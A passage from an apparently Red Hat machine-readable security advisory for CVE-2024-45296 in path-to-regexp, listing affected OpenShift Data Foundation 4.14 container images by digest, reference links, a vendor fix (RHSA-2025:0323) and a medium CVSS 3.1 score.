"9Base-RHODF-4.14:odf4/odf-operator-bundle@sha256:26459b59f76a3e8cc6fed7907b044921fa61a27d91c3b174ea7f35d120d99a6e_ppc64le", "9Base-RHODF-4.14:odf4/odf-operator-bundle@sha256:4412748a0cf46c60539a4fefdc8390040a5c61fa8eee6137a8a402dcef9ddb01_amd64", "9Base-RHODF-4.14:odf4/odf-operator-bundle@sha256:b9c877af1b71bf3ec5f6025353c9d9b37e457e120ea0815c9090490a6b2217fd_s390x", "9Base-RHODF-4.14:odf4/odf-rhel9-operator@sha256:168d1924a17a77cc3a473bf48a90bfd3cb3134d30a667cbbf378fc96b3ad5803_amd64", "9Base-RHODF-4.14:odf4/odf-rhel9-operator@sha256:4a42286f3a5c31625fe29085c81627325006d6c1b63e8ad3c90b2bfa383b2439_s390x", "9Base-RHODF-4.14:odf4/odf-rhel9-operator@sha256:7609f4687626d3b178e211cc587b642acc688acd17274551bde6828ca5e702e5_ppc64le", "9Base-RHODF-4.14:odf4/odf-rhel9-operator@sha256:d1c814e55d7f91d8b096bf0983041e678ece0034fb3990630565ae32791d5d7c_arm64", "9Base-RHODF-4.14:odf4/odr-cluster-operator-bundle@sha256:91bf46b7a774f08aba77f25203cb4bfa2aa44073a50807b942190702c2364eff_s390x", "9Base-RHODF-4.14:odf4/odr-cluster-operator-bundle@sha256:a79234b0659b2e45b7661a7b86f658dedc01e7b9ff858251a26dab3a42650993_amd64", "9Base-RHODF-4.14:odf4/odr-cluster-operator-bundle@sha256:de86c539ff9dfe81d04cecee6fbd6ded1e8b4a3b598d855aa5c6baa98cf10d45_ppc64le", "9Base-RHODF-4.14:odf4/odr-hub-operator-bundle@sha256:14c3b888aff944bafe415da999e6c4d43f830f4ebe7bc1d681f92f0037751687_s390x", "9Base-RHODF-4.14:odf4/odr-hub-operator-bundle@sha256:2094cba9cbcf69f44a9176a5f8906f3faa95e0914272922311d0a9a28ca437bf_ppc64le", "9Base-RHODF-4.14:odf4/odr-hub-operator-bundle@sha256:ad8244e09fdbd18c7c9ee1bd398fbb36fbc403fba0e59553d037018351dba05d_amd64", "9Base-RHODF-4.14:odf4/odr-rhel9-operator@sha256:06b747af12530dd66554af69f072c35622fb57fbff9094b71dcc379ef13faa71_ppc64le", "9Base-RHODF-4.14:odf4/odr-rhel9-operator@sha256:6447bd5f6546704b4b8762c8c00dcd27141a0943fea33a02ee621087b4f353cf_s390x", "9Base-RHODF-4.14:odf4/odr-rhel9-operator@sha256:8be0734337b11f5bb35cdbd93dc3b93d37c66770b238bd26de673026ef201e62_arm64", "9Base-RHODF-4.14:odf4/odr-rhel9-operator@sha256:c49b2c30b19d5f0c13782910214819fc1a18b48c0f8a0d3064b2b4af24e1567f_amd64", "9Base-RHODF-4.14:odf4/rook-ceph-rhel9-operator@sha256:057af5f435a7ed786bdca3db5219fc58152dbe4e9afa997b91e5f6e930534025_amd64", "9Base-RHODF-4.14:odf4/rook-ceph-rhel9-operator@sha256:210ff59e38d274b3ad678b826078bdc896cb5f950ad2221724c03bda6939138b_ppc64le", "9Base-RHODF-4.14:odf4/rook-ceph-rhel9-operator@sha256:df1f250b1d40440eb8a5d97f3c2641f01b81d99fd67c42d14c6f89183f5486fd_s390x", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2024-45296", }, { category: "external", summary: "RHBZ#2310908", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2310908", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2024-45296", url: "https://www.cve.org/CVERecord?id=CVE-2024-45296", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2024-45296", url: "https://nvd.nist.gov/vuln/detail/CVE-2024-45296", }, { category: "external", summary: "https://github.com/pillarjs/path-to-regexp/commit/29b96b4a1de52824e1ca0f49a701183cc4ed476f", url: "https://github.com/pillarjs/path-to-regexp/commit/29b96b4a1de52824e1ca0f49a701183cc4ed476f", }, { category: "external", summary: "https://github.com/pillarjs/path-to-regexp/commit/60f2121e9b66b7b622cc01080df0aabda9eedee6", url: "https://github.com/pillarjs/path-to-regexp/commit/60f2121e9b66b7b622cc01080df0aabda9eedee6", }, { category: "external", summary: "https://github.com/pillarjs/path-to-regexp/security/advisories/GHSA-9wv6-86v2-598j", url: "https://github.com/pillarjs/path-to-regexp/security/advisories/GHSA-9wv6-86v2-598j", }, ], release_date: "2024-09-09T19:15:13.330000+00:00", remediations: [ { category: "vendor_fix", date: "2025-01-15T01:19:29+00:00", details: "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "9Base-RHODF-4.14:odf4/odf-console-rhel9@sha256:521022da39600a31fd4f1e3f72cfbc5c9315a53de21df57be71a63e4050a4491_ppc64le", "9Base-RHODF-4.14:odf4/odf-console-rhel9@sha256:88ddde7411b0ce4b0edd53e0b64c76afa8038fc4a8aa1450220e515759c30036_amd64", "9Base-RHODF-4.14:odf4/odf-console-rhel9@sha256:9c676d4cea288ae80afe61e6c2c2009da9969508aebd8eebce0f21513ba505f9_s390x", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2025:0323", }, { category: "workaround", details: "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.", product_ids: [ "9Base-RHODF-4.14:odf4/cephcsi-rhel9@sha256:08a046ba8c5a9284e7fc9263f51eee40a5203c5d41c25ac2df555694dbd5a395_s390x", "9Base-RHODF-4.14:odf4/cephcsi-rhel9@sha256:6b2cb0576d635bfeef719847a6b3a651b5527a0336fe57548ae609025ddb2016_amd64", "9Base-RHODF-4.14:odf4/cephcsi-rhel9@sha256:984f5852a4793d9883106ccca492b1daab60d3c85f21ad667f92efbe8e5d1c50_ppc64le", "9Base-RHODF-4.14:odf4/mcg-cli-rhel9@sha256:0f8ea96fc58192660d845131c760a258a8e33fc02fc85884aa9be5ea07fd5e26_arm64", "9Base-RHODF-4.14:odf4/mcg-cli-rhel9@sha256:1f9ed27e2bd7b881aa5bc06571cf1cd459d577746e01f388bef01679013958f5_s390x", "9Base-RHODF-4.14:odf4/mcg-cli-rhel9@sha256:a665d06e0ec627db26cf47e0e19a36793f185fbf7dcb2a756983b0c08d041a09_ppc64le", "9Base-RHODF-4.14:odf4/mcg-cli-rhel9@sha256:e33c0ee4709e501d0a25c9da0089cb28b79ee80d28706465b55b9b17f807d260_amd64", "9Base-RHODF-4.14:odf4/mcg-core-rhel9@sha256:8d8230c10fa25e17fdac866971ecbdcec369e998f4f965eab27abab46d1eaf4d_amd64", "9Base-RHODF-4.14:odf4/mcg-core-rhel9@sha256:8dbb2f97682ab4a0f88e4b63485738f591a002faded8d1e5a01f918abd0a22b5_arm64", "9Base-RHODF-4.14:odf4/mcg-core-rhel9@sha256:bc5578e6f07cd0692abd897bf25b99361f1044a10ddcefefae13d3af338b3d58_ppc64le", "9Base-RHODF-4.14:odf4/mcg-core-rhel9@sha256:cf73fc2fa89884542a1f0e333bd9e1dd587a05e86442d67a316cd1c1d26c925d_s390x", "9Base-RHODF-4.14:odf4/mcg-operator-bundle@sha256:a42cd3a47eae7d05c44b438321da63faaee8274e4099171ec30c75005526f05d_ppc64le", "9Base-RHODF-4.14:odf4/mcg-operator-bundle@sha256:a73e671a9db5b88691800cefb2c903e7012499bc857e6cca62af958a35b5eab6_s390x", "9Base-RHODF-4.14:odf4/mcg-operator-bundle@sha256:f034e4be8b4e4e29ae79b12b800bf9ea682fa006a3ba6e84f42e06167a239750_amd64", "9Base-RHODF-4.14:odf4/mcg-rhel9-operator@sha256:0af9a6828abb53c18dae132b6a91862a85b5ad0b3f3ffbded002955af2fd04e2_s390x", "9Base-RHODF-4.14:odf4/mcg-rhel9-operator@sha256:1e20312fdd047dfd87b67d0bdc6a493df330c58671bcd0e078f22686df4a8d66_ppc64le", "9Base-RHODF-4.14:odf4/mcg-rhel9-operator@sha256:bb82af60a467551305c8628e6c8bac0b0d01637a0fb04b4142e69c90d3003434_arm64", "9Base-RHODF-4.14:odf4/mcg-rhel9-operator@sha256:fc98e8793dac5fcdb663967a7fd27c03d4cbb38295a5b1138f30cc1936bec92b_amd64", "9Base-RHODF-4.14:odf4/ocs-client-console-rhel9@sha256:3d2aba1307256ae6ee3a2dffaf0d175f7d204f7484712c1ec083d74203de2cb8_ppc64le", "9Base-RHODF-4.14:odf4/ocs-client-console-rhel9@sha256:5e05fc58b6b37b6e6f45a0042d3b167760fcc3dd5d14f4620a889d5feb90ae76_amd64", "9Base-RHODF-4.14:odf4/ocs-client-console-rhel9@sha256:f5976d4c7303ddb27dd91f33517af1e74cdf42e3539219c30c0c87408a085f95_s390x", "9Base-RHODF-4.14:odf4/ocs-client-operator-bundle@sha256:23aad767b433979e8465b4420278bf41a729e32530f80ef3bb3e98466afca95f_amd64", "9Base-RHODF-4.14:odf4/ocs-client-operator-bundle@sha256:3e398e98250d9638c8ad75bf88ae2cb936d499c1ebf0d0cc897ce37fbb25b42b_ppc64le", "9Base-RHODF-4.14:odf4/ocs-client-operator-bundle@sha256:59921e0c5c495c57a8efd9022b95bf0964fff99ba6f207cd49ed3b0112189f45_s390x", "9Base-RHODF-4.14:odf4/ocs-client-rhel9-operator@sha256:12fa0510c846a2f2d7984ab844faf117848aa9b70bf1642e140a20729fea3b4a_ppc64le", "9Base-RHODF-4.14:odf4/ocs-client-rhel9-operator@sha256:aeabac054147c3be143ddfcc48702332a58d17a31e461c1cf863fa273a5364e0_arm64", "9Base-RHODF-4.14:odf4/ocs-client-rhel9-operator@sha256:afcecc910feb27ffc8c48ce6aa52f2d305fd785b7a31e8d035d14f771f9993ae_amd64", "9Base-RHODF-4.14:odf4/ocs-client-rhel9-operator@sha256:f0fab98314e526b530a06a4859cab011647358ea65827288bd12d97ac1cf6e38_s390x", "9Base-RHODF-4.14:odf4/ocs-metrics-exporter-rhel9@sha256:06c5ad2463ba39e95ad251fd388b2c604deec27da05ef2c4d98952173eb56787_s390x", "9Base-RHODF-4.14:odf4/ocs-metrics-exporter-rhel9@sha256:9038bc5b6d2713e79672f2f574ebe849bb15dccc025a38fc2380e443430f05e6_ppc64le", "9Base-RHODF-4.14:odf4/ocs-metrics-exporter-rhel9@sha256:cfbbab395069de17bb86357e54d2a6a89e5fe671b938b7a42e4c8ab1eb951e49_amd64", "9Base-RHODF-4.14:odf4/ocs-operator-bundle@sha256:3d161f9b4d88c502382b32abe4392af4a5b141fa11851f335f32745c090971a5_ppc64le", "9Base-RHODF-4.14:odf4/ocs-operator-bundle@sha256:a967f7349b22cc96c11191bf31c002ef6fec7fd4214398df29ecdb7c72d4718c_s390x", "9Base-RHODF-4.14:odf4/ocs-operator-bundle@sha256:b2cf0ade1d9c2e16e4fec4e2886691f5e4d95210bdf68377cd22aa6a3bd409d4_amd64", "9Base-RHODF-4.14:odf4/ocs-rhel9-operator@sha256:215778987ac0f6449b168481b84a8b253cd4577711055ca66d259fdbf37e9af9_s390x", "9Base-RHODF-4.14:odf4/ocs-rhel9-operator@sha256:60b08d3094ed01d2e5570973964f08cd9a81c794b1e187d595dc735436004cc2_arm64", "9Base-RHODF-4.14:odf4/ocs-rhel9-operator@sha256:7c98d7e882e06d09322f9eefcd67a26a9b96e81708a1c2d9095c93e280bee66a_amd64", "9Base-RHODF-4.14:odf4/ocs-rhel9-operator@sha256:e81785d999d583b8a57e6be3eecc7edfa042552e4ae0c2a18460316a68828fb1_ppc64le", "9Base-RHODF-4.14:odf4/odf-console-rhel9@sha256:521022da39600a31fd4f1e3f72cfbc5c9315a53de21df57be71a63e4050a4491_ppc64le", "9Base-RHODF-4.14:odf4/odf-console-rhel9@sha256:88ddde7411b0ce4b0edd53e0b64c76afa8038fc4a8aa1450220e515759c30036_amd64", "9Base-RHODF-4.14:odf4/odf-console-rhel9@sha256:9c676d4cea288ae80afe61e6c2c2009da9969508aebd8eebce0f21513ba505f9_s390x", "9Base-RHODF-4.14:odf4/odf-cosi-sidecar-rhel9@sha256:7bd34f3be6e5a6e689ede195ef1b29843b5eb0cf839021816c7e57819b0d496e_s390x", "9Base-RHODF-4.14:odf4/odf-cosi-sidecar-rhel9@sha256:cada6c55b8adbafd7238399b13748432b4e2937eb5aa7b1c0d40573983f4b953_amd64", "9Base-RHODF-4.14:odf4/odf-cosi-sidecar-rhel9@sha256:df2648d2c5f839bde961fe8e3badbaf6cf72c7b62c133b1cb27c4ee7e66ac5f0_ppc64le", "9Base-RHODF-4.14:odf4/odf-csi-addons-operator-bundle@sha256:b16ddba3e229faf0aa5d01f0dd6452872c6a44679a74359979a9c09c595bbcc8_s390x", "9Base-RHODF-4.14:odf4/odf-csi-addons-operator-bundle@sha256:c4b1229ac6308e623a660b37b3f52870eac8c9566d2068173ffadc52aee8da12_ppc64le", "9Base-RHODF-4.14:odf4/odf-csi-addons-operator-bundle@sha256:ef593bb97792c40a0706924dbfbc9dd0072d0889b92678b8ebaf55227d66f5a4_amd64", "9Base-RHODF-4.14:odf4/odf-csi-addons-rhel9-operator@sha256:326cb06c987e275b1c1c7c9fef1e96d343223ee150ed3c58cfc42ccf4765fe03_ppc64le", "9Base-RHODF-4.14:odf4/odf-csi-addons-rhel9-operator@sha256:3366ad94a8cba707735d4cbbc692221b62a5fbef387edb70e3660f55ae718e7a_arm64", "9Base-RHODF-4.14:odf4/odf-csi-addons-rhel9-operator@sha256:ccd9cdb192b4275b9c7bb58b72df90df0ad6ff807e2f00ed04710655042f66d5_amd64", "9Base-RHODF-4.14:odf4/odf-csi-addons-rhel9-operator@sha256:f3ab303fdafcbef708c92a33ad0775fdae4744735ae600e7aa692e62a7fade10_s390x", "9Base-RHODF-4.14:odf4/odf-csi-addons-sidecar-rhel9@sha256:09d88b10bd0e674f5d0efae7b6a2d98db7634e2b594a44dbdae35d6a872fb0c0_amd64", "9Base-RHODF-4.14:odf4/odf-csi-addons-sidecar-rhel9@sha256:4e2db57173669e54f65196c175d5e47e74076d8164f57f90da86fcef8aa92281_arm64", "9Base-RHODF-4.14:odf4/odf-csi-addons-sidecar-rhel9@sha256:5d8e98b7f5b07f77e707cf73673dcf4648624da51d34d561d6bdc2b3fde8f541_s390x", "9Base-RHODF-4.14:odf4/odf-csi-addons-sidecar-rhel9@sha256:bac9dfa4b2d31316e0fcabc3e2c87c830c7e410d0b9c0e485ae62ea4da79d2c4_ppc64le", "9Base-RHODF-4.14:odf4/odf-multicluster-console-rhel9@sha256:171817821112bd026a41faae5cf98fd06ed5d0cf063d622f24fa695bcb1213b4_amd64", "9Base-RHODF-4.14:odf4/odf-multicluster-console-rhel9@sha256:68c42668721898d68bc3b255bedca2124dee662626542793c9bfadc520d473c8_ppc64le", "9Base-RHODF-4.14:odf4/odf-multicluster-console-rhel9@sha256:85505b18dc32d34de3f9d6ca779acc84e8c500f106460502597f00fe8626509b_s390x", "9Base-RHODF-4.14:odf4/odf-multicluster-operator-bundle@sha256:11968f525a32bdd28d90ecc8b0eb32838c4eab155a77f0453685dc346f5c106d_amd64", "9Base-RHODF-4.14:odf4/odf-multicluster-operator-bundle@sha256:389291fcc275966724880ec3f8b6732020027e162e515684e889a76c686d8163_s390x", "9Base-RHODF-4.14:odf4/odf-multicluster-operator-bundle@sha256:73448db0de00c6a40ed20d0d167b7e98f89c8e3eebc45f675cc210e27bd95c0c_ppc64le", "9Base-RHODF-4.14:odf4/odf-multicluster-rhel9-operator@sha256:08bd33241646abb79e57a6de5aac3611f0f3238c11dfa76bd135e8fc745eaf97_ppc64le", "9Base-RHODF-4.14:odf4/odf-multicluster-rhel9-operator@sha256:2baf3d66710d7673ea20562912597b058a3d0a9b428bdf1ba792d0624c31f284_s390x", "9Base-RHODF-4.14:odf4/odf-multicluster-rhel9-operator@sha256:59e97364ffd0cf0b64f95cbb65dcfcac7d982bffc98dd87e64a5c0e0d114e36b_arm64", "9Base-RHODF-4.14:odf4/odf-multicluster-rhel9-operator@sha256:eb4626677b340ac11237dc9269071732b45642238afb3afdabe7acf535464fda_amd64", "9Base-RHODF-4.14:odf4/odf-must-gather-rhel9@sha256:1318f5f3119a2b9a5b22e7687d3b1d5212394dda2d95b6e02c98b8ffcb87660f_amd64", "9Base-RHODF-4.14:odf4/odf-must-gather-rhel9@sha256:722eadfcf62be37bf9d714ac4336440ed98615269423c3ba3b65b70b6c6acd29_arm64", "9Base-RHODF-4.14:odf4/odf-must-gather-rhel9@sha256:a0ef2966b464a5602ab2d936772dc74ca55212a11c0ec0f19db5ff61d66c2980_ppc64le", "9Base-RHODF-4.14:odf4/odf-must-gather-rhel9@sha256:d64b01bd4ace2795a62a7bfb2b385930e46f76eb12cede706d10b16ba0707750_s390x", "9Base-RHODF-4.14:odf4/odf-operator-bundle@sha256:26459b59f76a3e8cc6fed7907b044921fa61a27d91c3b174ea7f35d120d99a6e_ppc64le", "9Base-RHODF-4.14:odf4/odf-operator-bundle@sha256:4412748a0cf46c60539a4fefdc8390040a5c61fa8eee6137a8a402dcef9ddb01_amd64", "9Base-RHODF-4.14:odf4/odf-operator-bundle@sha256:b9c877af1b71bf3ec5f6025353c9d9b37e457e120ea0815c9090490a6b2217fd_s390x", "9Base-RHODF-4.14:odf4/odf-rhel9-operator@sha256:168d1924a17a77cc3a473bf48a90bfd3cb3134d30a667cbbf378fc96b3ad5803_amd64", "9Base-RHODF-4.14:odf4/odf-rhel9-operator@sha256:4a42286f3a5c31625fe29085c81627325006d6c1b63e8ad3c90b2bfa383b2439_s390x", "9Base-RHODF-4.14:odf4/odf-rhel9-operator@sha256:7609f4687626d3b178e211cc587b642acc688acd17274551bde6828ca5e702e5_ppc64le", "9Base-RHODF-4.14:odf4/odf-rhel9-operator@sha256:d1c814e55d7f91d8b096bf0983041e678ece0034fb3990630565ae32791d5d7c_arm64", "9Base-RHODF-4.14:odf4/odr-cluster-operator-bundle@sha256:91bf46b7a774f08aba77f25203cb4bfa2aa44073a50807b942190702c2364eff_s390x", "9Base-RHODF-4.14:odf4/odr-cluster-operator-bundle@sha256:a79234b0659b2e45b7661a7b86f658dedc01e7b9ff858251a26dab3a42650993_amd64", "9Base-RHODF-4.14:odf4/odr-cluster-operator-bundle@sha256:de86c539ff9dfe81d04cecee6fbd6ded1e8b4a3b598d855aa5c6baa98cf10d45_ppc64le", "9Base-RHODF-4.14:odf4/odr-hub-operator-bundle@sha256:14c3b888aff944bafe415da999e6c4d43f830f4ebe7bc1d681f92f0037751687_s390x", "9Base-RHODF-4.14:odf4/odr-hub-operator-bundle@sha256:2094cba9cbcf69f44a9176a5f8906f3faa95e0914272922311d0a9a28ca437bf_ppc64le", "9Base-RHODF-4.14:odf4/odr-hub-operator-bundle@sha256:ad8244e09fdbd18c7c9ee1bd398fbb36fbc403fba0e59553d037018351dba05d_amd64", "9Base-RHODF-4.14:odf4/odr-rhel9-operator@sha256:06b747af12530dd66554af69f072c35622fb57fbff9094b71dcc379ef13faa71_ppc64le", "9Base-RHODF-4.14:odf4/odr-rhel9-operator@sha256:6447bd5f6546704b4b8762c8c00dcd27141a0943fea33a02ee621087b4f353cf_s390x", "9Base-RHODF-4.14:odf4/odr-rhel9-operator@sha256:8be0734337b11f5bb35cdbd93dc3b93d37c66770b238bd26de673026ef201e62_arm64", "9Base-RHODF-4.14:odf4/odr-rhel9-operator@sha256:c49b2c30b19d5f0c13782910214819fc1a18b48c0f8a0d3064b2b4af24e1567f_amd64", "9Base-RHODF-4.14:odf4/rook-ceph-rhel9-operator@sha256:057af5f435a7ed786bdca3db5219fc58152dbe4e9afa997b91e5f6e930534025_amd64", "9Base-RHODF-4.14:odf4/rook-ceph-rhel9-operator@sha256:210ff59e38d274b3ad678b826078bdc896cb5f950ad2221724c03bda6939138b_ppc64le", "9Base-RHODF-4.14:odf4/rook-ceph-rhel9-operator@sha256:df1f250b1d40440eb8a5d97f3c2641f01b81d99fd67c42d14c6f89183f5486fd_s390x", ], }, ], scores: [ { cvss_v3: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "LOW", baseScore: 5.3, baseSeverity: "MEDIUM", confidentialityImpact: "NONE", integrityImpact: "NONE", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", version: "3.1", }, products: [ "9Base-RHODF-4.14:odf4/cephcsi-rhel9@sha256:08a046ba8c5a9284e7fc9263f51eee40a5203c5d41c25ac2df555694dbd5a395_s390x", "9Base-RHODF-4.14:odf4/cephcsi-rhel9@sha256:6b2cb0576d635bfeef719847a6b3a651b5527a0336fe57548ae609025ddb2016_amd64", "9Base-RHODF-4.14:odf4/cephcsi-rhel9@sha256:984f5852a4793d9883106ccca492b1daab60d3c85f21ad667f92efbe8e5d1c50_ppc64le", "9Base-RHODF-4.14:odf4/mcg-cli-rhel9@sha256:0f8ea96fc58192660d845131c760a258a8e33fc02fc85884aa9be5ea07fd5e26_arm64", "9Base-RHODF-4.14:odf4/mcg-cli-rhel9@sha256:1f9ed27e2bd7b881aa5bc06571cf1cd459d577746e01f388bef01679013958f5_s390x", "9Base-RHODF-4.14:odf4/mcg-cli-rhel9@sha256:a665d06e0ec627db26cf47e0e19a36793f185fbf7dcb2a756983b0c08d041a09_ppc64le", "9Base-RHODF-4.14:odf4/mcg-cli-rhel9@sha256:e33c0ee4709e501d0a25c9da0089cb28b79ee80d28706465b55b9b17f807d260_amd64", "9Base-RHODF-4.14:odf4/mcg-core-rhel9@sha256:8d8230c10fa25e17fdac866971ecbdcec369e998f4f965eab27abab46d1eaf4d_amd64", "9Base-RHODF-4.14:odf4/mcg-core-rhel9@sha256:8dbb2f97682ab4a0f88e4b63485738f591a002faded8d1e5a01f918abd0a22b5_arm64", "9Base-RHODF-4.14:odf4/mcg-core-rhel9@sha256:bc5578e6f07cd0692abd897bf25b99361f1044a10ddcefefae13d3af338b3d58_ppc64le", "9Base-RHODF-4.14:odf4/mcg-core-rhel9@sha256:cf73fc2fa89884542a1f0e333bd9e1dd587a05e86442d67a316cd1c1d26c925d_s390x", "9Base-RHODF-4.14:odf4/mcg-operator-bundle@sha256:a42cd3a47eae7d05c44b438321da63faaee8274e4099171ec30c75005526f05d_ppc64le", "9Base-RHODF-4.14:odf4/mcg-operator-bundle@sha256:a73e671a9db5b88691800cefb2c903e7012499bc857e6cca62af958a35b5eab6_s390x", "9Base-RHODF-4.14:odf4/mcg-operator-bundle@sha256:f034e4be8b4e4e29ae79b12b800bf9ea682fa006a3ba6e84f42e06167a239750_amd64", "9Base-RHODF-4.14:odf4/mcg-rhel9-operator@sha256:0af9a6828abb53c18dae132b6a91862a85b5ad0b3f3ffbded002955af2fd04e2_s390x", "9Base-RHODF-4.14:odf4/mcg-rhel9-operator@sha256:1e20312fdd047dfd87b67d0bdc6a493df330c58671bcd0e078f22686df4a8d66_ppc64le", "9Base-RHODF-4.14:odf4/mcg-rhel9-operator@sha256:bb82af60a467551305c8628e6c8bac0b0d01637a0fb04b4142e69c90d3003434_arm64", "9Base-RHODF-4.14:odf4/mcg-rhel9-operator@sha256:fc98e8793dac5fcdb663967a7fd27c03d4cbb38295a5b1138f30cc1936bec92b_amd64", "9Base-RHODF-4.14:odf4/ocs-client-console-rhel9@sha256:3d2aba1307256ae6ee3a2dffaf0d175f7d204f7484712c1ec083d74203de2cb8_ppc64le", "9Base-RHODF-4.14:odf4/ocs-client-console-rhel9@sha256:5e05fc58b6b37b6e6f45a0042d3b167760fcc3dd5d14f4620a889d5feb90ae76_amd64", "9Base-RHODF-4.14:odf4/ocs-client-console-rhel9@sha256:f5976d4c7303ddb27dd91f33517af1e74cdf42e3539219c30c0c87408a085f95_s390x", "9Base-RHODF-4.14:odf4/ocs-client-operator-bundle@sha256:23aad767b433979e8465b4420278bf41a729e32530f80ef3bb3e98466afca95f_amd64", "9Base-RHODF-4.14:odf4/ocs-client-operator-bundle@sha256:3e398e98250d9638c8ad75bf88ae2cb936d499c1ebf0d0cc897ce37fbb25b42b_ppc64le", "9Base-RHODF-4.14:odf4/ocs-client-operator-bundle@sha256:59921e0c5c495c57a8efd9022b95bf0964fff99ba6f207cd49ed3b0112189f45_s390x", "9Base-RHODF-4.14:odf4/ocs-client-rhel9-operator@sha256:12fa0510c846a2f2d7984ab844faf117848aa9b70bf1642e140a20729fea3b4a_ppc64le", "9Base-RHODF-4.14:odf4/ocs-client-rhel9-operator@sha256:aeabac054147c3be143ddfcc48702332a58d17a31e461c1cf863fa273a5364e0_arm64", "9Base-RHODF-4.14:odf4/ocs-client-rhel9-operator@sha256:afcecc910feb27ffc8c48ce6aa52f2d305fd785b7a31e8d035d14f771f9993ae_amd64", "9Base-RHODF-4.14:odf4/ocs-client-rhel9-operator@sha256:f0fab98314e526b530a06a4859cab011647358ea65827288bd12d97ac1cf6e38_s390x", "9Base-RHODF-4.14:odf4/ocs-metrics-exporter-rhel9@sha256:06c5ad2463ba39e95ad251fd388b2c604deec27da05ef2c4d98952173eb56787_s390x", "9Base-RHODF-4.14:odf4/ocs-metrics-exporter-rhel9@sha256:9038bc5b6d2713e79672f2f574ebe849bb15dccc025a38fc2380e443430f05e6_ppc64le", "9Base-RHODF-4.14:odf4/ocs-metrics-exporter-rhel9@sha256:cfbbab395069de17bb86357e54d2a6a89e5fe671b938b7a42e4c8ab1eb951e49_amd64", "9Base-RHODF-4.14:odf4/ocs-operator-bundle@sha256:3d161f9b4d88c502382b32abe4392af4a5b141fa11851f335f32745c090971a5_ppc64le", "9Base-RHODF-4.14:odf4/ocs-operator-bundle@sha256:a967f7349b22cc96c11191bf31c002ef6fec7fd4214398df29ecdb7c72d4718c_s390x", "9Base-RHODF-4.14:odf4/ocs-operator-bundle@sha256:b2cf0ade1d9c2e16e4fec4e2886691f5e4d95210bdf68377cd22aa6a3bd409d4_amd64", "9Base-RHODF-4.14:odf4/ocs-rhel9-operator@sha256:215778987ac0f6449b168481b84a8b253cd4577711055ca66d259fdbf37e9af9_s390x", "9Base-RHODF-4.14:odf4/ocs-rhel9-operator@sha256:60b08d3094ed01d2e5570973964f08cd9a81c794b1e187d595dc735436004cc2_arm64", "9Base-RHODF-4.14:odf4/ocs-rhel9-operator@sha256:7c98d7e882e06d09322f9eefcd67a26a9b96e81708a1c2d9095c93e280bee66a_amd64", "9Base-RHODF-4.14:odf4/ocs-rhel9-operator@sha256:e81785d999d583b8a57e6be3eecc7edfa042552e4ae0c2a18460316a68828fb1_ppc64le", "9Base-RHODF-4.14:odf4/odf-console-rhel9@sha256:521022da39600a31fd4f1e3f72cfbc5c9315a53de21df57be71a63e4050a4491_ppc64le", "9Base-RHODF-4.14:odf4/odf-console-rhel9@sha256:88ddde7411b0ce4b0edd53e0b64c76afa8038fc4a8aa1450220e515759c30036_amd64", "9Base-RHODF-4.14:odf4/odf-console-rhel9@sha256:9c676d4cea288ae80afe61e6c2c2009da9969508aebd8eebce0f21513ba505f9_s390x", "9Base-RHODF-4.14:odf4/odf-cosi-sidecar-rhel9@sha256:7bd34f3be6e5a6e689ede195ef1b29843b5eb0cf839021816c7e57819b0d496e_s390x", "9Base-RHODF-4.14:odf4/odf-cosi-sidecar-rhel9@sha256:cada6c55b8adbafd7238399b13748432b4e2937eb5aa7b1c0d40573983f4b953_amd64", "9Base-RHODF-4.14:odf4/odf-cosi-sidecar-rhel9@sha256:df2648d2c5f839bde961fe8e3badbaf6cf72c7b62c133b1cb27c4ee7e66ac5f0_ppc64le", "9Base-RHODF-4.14:odf4/odf-csi-addons-operator-bundle@sha256:b16ddba3e229faf0aa5d01f0dd6452872c6a44679a74359979a9c09c595bbcc8_s390x", "9Base-RHODF-4.14:odf4/odf-csi-addons-operator-bundle@sha256:c4b1229ac6308e623a660b37b3f52870eac8c9566d2068173ffadc52aee8da12_ppc64le", "9Base-RHODF-4.14:odf4/odf-csi-addons-operator-bundle@sha256:ef593bb97792c40a0706924dbfbc9dd0072d0889b92678b8ebaf55227d66f5a4_amd64", "9Base-RHODF-4.14:odf4/odf-csi-addons-rhel9-operator@sha256:326cb06c987e275b1c1c7c9fef1e96d343223ee150ed3c58cfc42ccf4765fe03_ppc64le", "9Base-RHODF-4.14:odf4/odf-csi-addons-rhel9-operator@sha256:3366ad94a8cba707735d4cbbc692221b62a5fbef387edb70e3660f55ae718e7a_arm64", "9Base-RHODF-4.14:odf4/odf-csi-addons-rhel9-operator@sha256:ccd9cdb192b4275b9c7bb58b72df90df0ad6ff807e2f00ed04710655042f66d5_amd64", "9Base-RHODF-4.14:odf4/odf-csi-addons-rhel9-operator@sha256:f3ab303fdafcbef708c92a33ad0775fdae4744735ae600e7aa692e62a7fade10_s390x", "9Base-RHODF-4.14:odf4/odf-csi-addons-sidecar-rhel9@sha256:09d88b10bd0e674f5d0efae7b6a2d98db7634e2b594a44dbdae35d6a872fb0c0_amd64", "9Base-RHODF-4.14:odf4/odf-csi-addons-sidecar-rhel9@sha256:4e2db57173669e54f65196c175d5e47e74076d8164f57f90da86fcef8aa92281_arm64", "9Base-RHODF-4.14:odf4/odf-csi-addons-sidecar-rhel9@sha256:5d8e98b7f5b07f77e707cf73673dcf4648624da51d34d561d6bdc2b3fde8f541_s390x", "9Base-RHODF-4.14:odf4/odf-csi-addons-sidecar-rhel9@sha256:bac9dfa4b2d31316e0fcabc3e2c87c830c7e410d0b9c0e485ae62ea4da79d2c4_ppc64le", "9Base-RHODF-4.14:odf4/odf-multicluster-console-rhel9@sha256:171817821112bd026a41faae5cf98fd06ed5d0cf063d622f24fa695bcb1213b4_amd64", 